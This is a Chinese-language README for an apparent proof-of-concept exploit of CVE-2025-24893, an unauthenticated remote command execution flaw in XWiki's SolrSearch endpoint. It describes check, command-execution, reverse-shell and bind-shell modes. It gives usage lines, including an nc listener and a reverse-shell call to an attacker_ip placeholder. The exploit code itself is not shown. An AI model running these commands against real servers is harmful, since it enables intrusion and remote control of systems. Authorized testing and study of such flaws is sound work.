
CVE-2025-24893 的概念验证,演示了通过不安全的服务器端模板评估在 XWiki 中实现未经认证的远程命令执行。
本仓库包含一个针对CVE-2025-24893的受控概念验证(PoC),该漏洞是影响XWiki的**未认证远程命令执行(RCE)**漏洞。
由于不安全的服务器端模板和脚本评估,该漏洞允许攻击者在服务器上执行任意操作系统命令。
XWiki是一个开源的企业级维基平台,常用于:
由于XWiki经常部署在面向互联网的服务器上,其请求处理和脚本逻辑中的安全漏洞可能产生严重的现实影响。
传递给 SolrSearch 端点的用户可控输入未经过正确验证,并被 Groovy 脚本引擎评估。这使得攻击者提供的输入被解释为可执行的服务器端代码,从而导致在主机系统上执行命令。
该 PoC 演示以下功能:
漏洞检测模式 通过执行良性的服务器端表达式,安全确认目标实例是否存在漏洞。
远程命令执行 演示在目标系统上执行任意命令。
反弹Shell执行 从目标系统向测试人员建立出站Shell连接。
绑定Shell(可选) 在目标主机上打开一个监听Shell(可靠性低于反弹Shell)。
python3 xwiki_cve_2025_24893.py http://target:8080 -m check
nc -lvnp 4444
python3 xwiki_cve_2025_24893.py http://target:8080 -m reverse -lh <attacker_ip> -lp 4444
python3 xwiki_cve_2025_24893.py http://target:8080 -m bind -lp 4444
SolrSearch 端点发送精心构造的请求本项目严格仅供教育目的和授权安全测试使用。
禁止在未经明确许可的情况下,针对任何系统擅自使用此代码。
本仓库旨在演示: